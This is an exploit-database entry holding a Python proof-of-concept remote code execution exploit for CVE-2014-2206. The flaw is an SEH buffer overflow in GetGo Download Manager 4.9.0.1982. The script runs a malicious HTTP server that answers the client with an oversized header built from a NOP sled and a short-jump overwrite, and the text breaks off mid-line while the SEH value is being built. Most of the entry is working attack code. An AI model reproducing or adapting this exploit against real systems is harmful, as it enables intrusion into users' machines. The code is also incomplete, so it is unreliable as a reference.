GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution

Julien Ahrens 2014-03-09 remote windows
#!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version:       v4.9.0.1982
# CVE:           CVE-2014-2206
# Date:          2014-03-09
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on:     WinXP SP3-GER 
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#

from socket import *
from time import sleep
from struct import pack
 
host = "192.168.0.1"
port = 80
 
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
 
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
 
junk0 = "\x90" * 4107
nseh = "\x90\x90\xEB\x06"
seh=pack('